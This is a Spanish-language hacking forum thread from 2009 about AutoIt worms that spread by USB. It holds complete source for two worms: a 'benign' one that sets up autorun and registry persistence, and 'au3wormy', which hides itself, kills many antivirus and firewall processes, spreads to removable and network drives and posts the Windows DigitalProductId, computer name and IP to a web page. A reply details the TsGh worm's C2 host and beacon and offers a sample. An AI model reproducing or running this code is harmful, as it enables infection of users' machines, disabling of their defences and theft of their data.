Autor Tema: Propagacion por USB con AutoIT  (Leído 7979 veces)

0 Usuarios y 1 Visitante están viendo este tema.

hkm

  • Moderador
  • *
  • Mensajes: 1245
  • Liked: 292
    • Hakim.Ws
Propagacion por USB con AutoIT
« : enero 26, 2009, 11:20:07 pm »
Pues con esto del confiker, downadup, etc. me dieron ganas de hacer  un programa que pueda propagarse por USB y pues de paso ser persistente en windows.. un virus digamos, pero para no hacerlo malicioso se me ocurrio que su payload deberia ser deshabilitar el autorun de windows.

Asi que aqui lo tienen, no se esconde de ninguna forma, las funciones que tiene son las siguientes:

-Continuamente copia dos files a todas las unidades (autorun.inf y usbirus.exe)

-Se copia y corre desde el directorio de appdata de windows
--para que el usb se pueda desconectar despues de la infeccion
--para que windows vista te deje escribirlo en el disco duro

-En windows xp deshabilita el autorun sin intervencicon del usuario.
-En Vista crea un .reg y lo corre, preguntadole al usuario si quiere importar el reg.

-Se agrega al registro a CURRENT_USER ... Run


Asi que aqui lo tienen el virus que se propaga por usb y desactiva la propagacion de virus por  usb...
Código: usbirus.au3 [Seleccionar]

;Virus que se propaga por usb y lo unico que hace es
;deshabilitar la propagacion de virus por usb...xD
;hkm @ hakim.ws  -  1/24/09
AutoItSetOption("TrayIconHide", 1)

;Corre desde C:
If StringInStr(@AutoItExe, @AppDataDir&"\usbirus.exe") Then
;Se repite cada medio minuto
while(1)
;Detecta unidades
$var = DriveGetDrive( "all" )
If NOT @error Then
For $i = 1 to $var[0]
;Se copia a  todas las unidades
If FileExists($var[$i]&"\usbirus.exe") = 0 Then
FileCopy("usbirus.exe", $var[$i]&"/")
FileCopy("autorun.inf", $var[$i]&"/", 1)
EndIf
Next
EndIf
Sleep(30000)
WEnd
Else
;INSTALACION
;Genera un autorun.inf
$file = FileOpen("autorun.inf", 2)
FileWriteLine($file, "[Autorun]" & @CRLF &"Open=usbirus.exe")
FileClose($file)
;Copia los archivos al directorio de app data
FileCopy("usbirus.exe", @AppDataDir&"/")
FileCopy("autorun.inf", @AppDataDir&"/", 1)
;Se copia a todas las unidades
$var = DriveGetDrive( "all" )
If NOT @error Then
For $i = 1 to $var[0]
;Se copia a  todas las unidades
FileCopy("usbirus.exe", $var[$i]&"/")
FileCopy("autorun.inf", $var[$i]&"/", 1)
Next
EndIf
;Persistente
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "usbirus", "REG_SZ", @AppDataDir&"\usbirus.exe")

;PAYLOAD
;Deshabilita autorun.inf automaticamente en xp
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf", "", "REG_SZ", "@SYS:DoesNotExist")

;Si es vista pregunta si se quiere agregar el .reg para deshabilitarlo
if StringInStr(@OSVersion, "VISTA") Then
$file = FileOpen(@AppDataDir&"\autorunfix.reg", 2)
FileWriteLine($file, "REGEDIT4")
FileWriteLine($file, "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]")
FileWriteLine($file, '@="@SYS:DoesNotExist"')
FileClose($file)
ShellExecute(@AppDataDir&"\autorunfix.reg")
EndIf
;/PAYLOAD
Run(@AppDataDir&"\usbirus.exe")
Exit
EndIf
« Última Modificación: enero 26, 2009, 11:22:46 pm por hkm »

fresh

  • ***
  • Mensajes: 285
  • Liked: 7
    • http://www.hakim.ws
Re: Propagacion por USB con AutoIT
« Respuesta #1 : enero 27, 2009, 12:57:45 pm »
El virus sano lo nombraría yo jeje.  ;)
Podras engañar a todos ...excepto a ti mismo - Salomón Sorowitsch

beavis

  • Moderador
  • *
  • Mensajes: 1355
  • Liked: 81
    • underground
Re: Propagacion por USB con AutoIT
« Respuesta #2 : enero 27, 2009, 11:45:16 pm »
muy buena "tool" !!
así es como funciona el TsGh, una variante de los que Hkm menciona:

Primero crea alguno de estos archivos:

c:\Recycle\X-5-4-27-2345678318-4567890223-4234567884-2341\Desktop.ini
c:\Recycle\X-5-4-27-2345678318-4567890223-4234567884-2341\TsGh.exe
c:\Desktop.ini
c:\autorun.ini
c:\Recycle\X-5-4-27-2345678318-4567890223-4234567884-2341

despues te crea estas claves en el registro de win:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-21CX1C987892}

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-11CF-AAX5-21CX1C987892}]

    * StubPath = "c:\Recycle\X-5-4-27-2345678318-4567890223-4234567884-2341\TsGh.exe" <-------es lo que hace que el TsGh corra cuando inicia el windows

luego intenta conectarse a esta dir: x0r.xxxisniperixxx.cn:51987

y estos son los datos que envía:

00000000 | 5041 5353 2056 6972 7573 0D0A 4E49 434B | PASS Virus..NICK
00000010 | 2056 6972 5573 2D79 6267 6A72 696F 6C0D |  VirUs-ybgjriol.
00000020 | 0A55 5345 5220 5669 7255 7320 2222 2022 | .USER VirUs "" "
00000030 | 7A77 7622 203A 2003 382C 3102 0338 436F | zwv" : .8,1..8Co
00000040 | 6465 6420 0334 4279 2003 3841 686D 6564 | ded .4By .8Ahmed
00000050 | 2E52 616D 7A65 7940 486F 746D 6169 6C2E | .Ramzey@Hotmail.
00000060 | 436F 6D2E 2E0D 0A                       | Com....


y con deshabilitar el autorun, se la pela, les anexo muestra del gusano en cuestión, el pwd es: "beavis"




« Última Modificación: enero 27, 2009, 11:46:47 pm por beavis »
"Todos somos muy ignorantes. Lo que ocurre es que
no todos ignoramos las mismas cosas" Albert Einstein

"Las mujeres, quedan en segundo plano cuando una computadora este de por medio" el5patas 1001100100110011010101101

pulketo

  • ***
  • Mensajes: 289
  • Liked: 0
  • viviendo la vida...
Re: Propagacion por USB con AutoIT
« Respuesta #3 : febrero 21, 2009, 01:31:03 pm »
Y mi papa decia que no existia un virus (de computadora) bueno

excelente virus! ojala y se multiplique
 
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GE d-(++$) s:+ a C++ UL++ L+++ P W+++ !N w--- M-- !PS !t !5 e++ h! r+ y++
------END GEEK CODE BLOCK------

hkm

  • Moderador
  • *
  • Mensajes: 1245
  • Liked: 292
    • Hakim.Ws
Re: Propagacion por USB con AutoIT
« Respuesta #4 : febrero 21, 2009, 02:52:56 pm »
en realidad desde que hagas algo sin consentimiento del usuario es malo

hagiwhat

  • Mensajes: 2
  • Liked: 0
    • wordpress themes
Re: Propagacion por USB con AutoIT
« Respuesta #5 : marzo 06, 2009, 04:21:54 pm »
ohh really! thanks sir!

zoneM

  • ***
  • Mensajes: 76
  • Liked: 2
  • ZoneM - Z(1)M
Re: Propagacion por USB con AutoIT
« Respuesta #6 : marzo 16, 2009, 01:25:08 am »
O man no pude ver esto sin hacer mi versión jejeje. es solo un ejemplo.
 
Los pasos que sigue son:

Se copia, se da atributos de oculto y sistema,
se copia solo a los medios removibles, cierra los procesos comunes de
protección. Lee el registro de windows y  postea el digital product id a una web.
Se ejecuta cada 30 minutos. Y solo postea la info cuando llega por primera vez al
sistema.
Usa una UDF <http.au3>, los archivos necesarios para el ejemplo están en el .rar
y también el .exe (jejeje)
El valor obtenido todavía tiene que ser procesado para descubrir el product key.


Que se puede hacer con esto????.   Hagan sus ejemplos también amigos.

Lo llame au3wormy pero la neta no tiene  mucha importancia eso...................


Saludos.

MxCGen(4e.Ver);

Código: [Seleccionar]
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=wma.ico
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_Res_Comment=au3womy
#AutoIt3Wrapper_Res_requestedExecutionLevel=highestAvailable
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

;Virus : au3wormy basado en el codigo de <hkm> www.underground.org.mx
;payload: obtiene el digital product key de windows y lo postea en un url
;se propaga por usb. Cierra algunos procesos comunes de antivirus,
;antispyware, etc.. En general se porta un poquito mal pero se puede hacer mucho
;mas
;ZoneM MxCGen(4e.Ver)


#include<http.au3>

AutoItSetOption("TrayIconHide", 1) ;Hide tary icon


;Cerremos los antivirus

$PID = ProcessExists("MsMpEng.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("navapsvc.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("avkwctl.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("fsav32.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("mcshield.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("ntrtscan.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("avguard.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("ashServ.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("AVENGINE.EXE")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("avgemc.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("tmntsrv.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("gcasServ.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("SpybotSD.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("Ad-Aware.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("sunasServ.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("spysweeper.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("PPActiveDetection.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("msscli.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("Tmas.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("swdoctor.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("spycatcher.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("MpfService.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("blackd.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("fsdfwd.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("smc.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("zlclient.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("persfw.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("efpeadm.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("fsguiexe.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("kpf4gui.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("ccpfw.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("nod32krn.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("nod32kui.exe")
If $PID Then ProcessClose($PID)
$PID = ProcessExists("Ekrn.exe")
If $PID Then ProcessClose($PID)

;Ya esta en el systema??
If StringInStr(@AutoItExe, @AppDataDir&"\msnmsgr.exe") Then
;Se ejecuta cada media hora
while(1)
;Detecta unidades
$var = DriveGetDrive( "all" )
If NOT @error Then
For $i = 1 to $var[0]
;Se copia a  todas las unidades removibles y de red
if DriveGetType ($var[$i])="Removable" or ($var[$i])="Network" Then
If FileExists($var[$i]&"msnmsgr.exe") = 0 Then
FileCopy(@AppDataDir&"/"&"msnmsgr.exe", $var[$i]&"/", 1)
FileCopy(@AppDataDir&"/"&"autorun.inf", $var[$i]&"/", 1)
EndIf
EndIf
Next
EndIf
Sleep(900000) ;se ejecuta cada 15 min
WEnd
Else
;Si no esta en el sistema se INSTALA
;Genera un autorun.inf
$file = FileOpen("autorun.inf", 2)
FileWriteLine($file, "[Autorun]" & @CRLF &"open=msnmsgr.exe")
FileClose($file)
;Copia los archivos al directorio de app data
FileCopy("msnmsgr.exe", @AppDataDir&"/",1)
FileSetAttrib(@AppDataDir&"/"&"msnmsgr.exe","+HS")
FileCopy("autorun.inf", @AppDataDir&"/", 1)
FileSetAttrib(@AppDataDir&"/"&"autorun.inf","+HS")
;Se copia a todas las unidades
$var = DriveGetDrive( "all" )
If NOT @error Then
For $i = 1 to $var[0]
;Se copia a  todas las unidades removibles y de red
if DriveGetType ($var[$i])="Removable" or ($var[$i])="Network" Then
If FileExists($var[$i]&"msnmsgr.exe") = 0 Then
FileCopy(@AppDataDir&"/"&"msnmsgr.exe", $var[$i]&"/", 1)
FileCopy(@AppDataDir&"/"&"autorun.inf", $var[$i]&"/", 1)

EndIf
EndIf
Next
EndIf
;Persistencia
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "au3wormy", "REG_SZ", @AppDataDir&"\msnmsgr.exe")


;PAYLOAD 





if RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\au3", "ready") = "" Then
dim $host="localhost"
dim $page="/mxcms0.4/testdb.php"
dim $pid= RegRead ("HKLM\Software\Microsoft\Windows NT\CurrentVersion","DigitalProductId")
dim $data="pc="&@ComputerName&"&ip="&@IPAddress1&"&regid="&$pid&"&osver="&@OSTYPE&" "&@OSServicePack&" "&@OSBuild&" "&@OSLang&" "&@OSVersion
$data=_HTTPEncodeString($data)
$socket=_HTTPConnect($host)
_HTTPPost($host, $page, $socket, $data)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\au3", "ready", "REG_SZ", "1")
EndIf



Run(@AppDataDir&"\msnmsgr.exe")

Exit
EndIf

« Última Modificación: marzo 16, 2009, 02:01:48 am por zoneM »
i'll be back ¡¡¡¡¡